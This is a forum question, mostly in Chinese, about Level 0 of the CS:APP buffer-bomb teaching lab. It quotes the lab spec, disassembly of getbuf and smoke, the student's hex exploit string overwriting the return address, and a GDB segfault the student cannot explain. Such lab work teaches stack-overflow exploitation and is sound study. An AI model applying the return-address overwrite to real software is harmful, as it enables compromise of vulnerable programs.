cs app缓冲区溢出攻击

Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly /
6 val = getbuf();
7 /
Check for corrupted stack /
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
entry_check(0); /
Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.

Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a diassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
可以看到:Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test.
任务是把getbuf函数返回的地址改为smoke的地址。
getbuf函数的反汇编代码:
[cpp] view plain copy
0x08048ad0 <+0>: push %ebp

0x08048ad1 <+1>: mov %esp,%ebp

0x08048ad3 <+3>: sub $0x28,%esp

0x08048ad6 <+6>: lea -0x18(%ebp),%eax

0x08048ad9 <+9>: mov %eax,(%esp)

0x08048adc <+12>: call 0x80489c0

0x08048ae1 <+17>: leave

0x08048ae2 <+18>: mov $0x1,%eax

0x08048ae7 <+23>: ret

可以看到buff存放在返回地址的4+0x18=0x1c处,其十进制是28则要在输入填充28个数,后接smoke的地址
smoke反汇编:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 puts@plt
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 exit@plt
smoke地址08048eb0,因为是小端机器
所以填入
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
然而怎么都不对,输出
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4

Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
我试验,输入12个字符,就是刚超出buf长度也提示上面这个。按理论上面先pad28个字符是没毛病啊

1个回答

qq_15514565
zawdcxsa 我要是看博客能看懂问题所在就不会来问了。。
3 年多之前 回复
qq_15514565
zawdcxsa 图都是挂的
3 年多之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问
相关内容推荐